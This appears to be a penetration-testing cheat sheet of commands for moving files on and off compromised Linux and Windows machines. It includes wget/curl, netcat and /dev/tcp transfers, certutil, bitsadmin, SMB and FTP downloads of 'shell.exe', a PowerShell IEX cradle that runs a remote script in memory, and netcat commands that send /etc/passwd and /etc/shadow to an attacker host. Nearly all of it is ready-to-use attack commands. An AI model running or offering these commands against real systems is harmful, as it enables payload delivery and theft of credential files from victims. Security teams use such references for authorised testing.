File Transfers
Every method for moving files to and from targets.
LINUX TARGET
Python HTTP server + wget/curl
Most common method — Works on almost every Linux target
# On attacker:
python3 -m http.server 80
# On target:
wget http://$LHOST/file -O /tmp/file
curl http://$LHOST/file -o /tmp/file
Netcat file transfer
No HTTP needed — Direct TCP transfer
# On attacker (send):
nc -lvnp 4444 < file.txt
# On target (receive):
nc $LHOST 4444 > file.txt
SCP (via SSH)
Encrypted transfer — If you have SSH credentials
scp file.txt user@$IP:/tmp/file.txt
scp user@$IP:/etc/passwd ./passwd
Base64 encode/decode
No network transfer needed — Copy/paste through shell
# On attacker:
base64 -w 0 file.bin
# On target:
echo "BASE64STRING" | base64 -d > file.bin
/dev/tcp (bash only)
No tools needed — Bash built-in
# Attacker: nc -lvnp 4444 > file.txt
# Target:
cat /etc/passwd > /dev/tcp/$LHOST/4444
WINDOWS TARGET
certutil
Built into Windows — Download files via HTTP
certutil -urlcache -f http://$LHOST/shell.exe C:\Windows\Temp\shell.exe
PowerShell download cradles
Multiple methods — Try each if one is blocked
# DownloadFile (saves to disk):
(New-Object Net.WebClient).DownloadFile('http://$LHOST/shell.exe','C:\Windows\Temp\shell.exe')
# DownloadString (in-memory execution):
IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/shell.ps1')
# Invoke-WebRequest (PowerShell 3+):
Invoke-WebRequest -Uri http://$LHOST/shell.exe -OutFile C:\Windows\Temp\shell.exe
SMB share
Serve files via SMB — Often works when HTTP is blocked
# On attacker:
impacket-smbserver share $(pwd) -smb2support
# On target:
copy \\$LHOST\share\shell.exe C:\Windows\Temp\shell.exe
Bitsadmin
Built-in Windows tool — Alternative to certutil
bitsadmin /transfer job /download /priority high http://$LHOST/shell.exe C:\Windows\Temp\shell.exe
Windows FTP (non-interactive)
Script FTP commands — Bypass interactive prompt
echo open $LHOST> ftp.txt
echo USER anonymous>> ftp.txt
echo binary>> ftp.txt
echo GET shell.exe>> ftp.txt
echo bye>> ftp.txt
ftp -s:ftp.txt
EXFILTRATION
Netcat exfil
Send files back to attacker — Simple TCP
# Attacker: nc -lvnp 4444 > loot.txt
# Target: nc $LHOST 4444 < /etc/shadow